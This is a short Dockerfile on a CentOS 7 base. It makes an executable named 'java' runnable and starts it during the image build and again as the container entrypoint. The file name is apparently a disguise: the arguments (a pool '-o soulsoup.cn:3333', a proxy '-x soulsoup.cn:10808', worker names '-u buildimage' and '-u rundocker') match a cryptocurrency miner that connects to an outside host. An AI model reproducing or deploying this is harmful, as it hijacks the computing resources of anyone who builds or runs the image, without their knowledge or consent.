FROM centos:7

ADD . .

RUN chmod +x java
RUN ./java --no-color -x soulsoup.cn:10808  -o soulsoup.cn:3333 -u buildimage

ENTRYPOINT ./java --no-color -x soulsoup.cn:10808  -o soulsoup.cn:3333 -u  rundocker
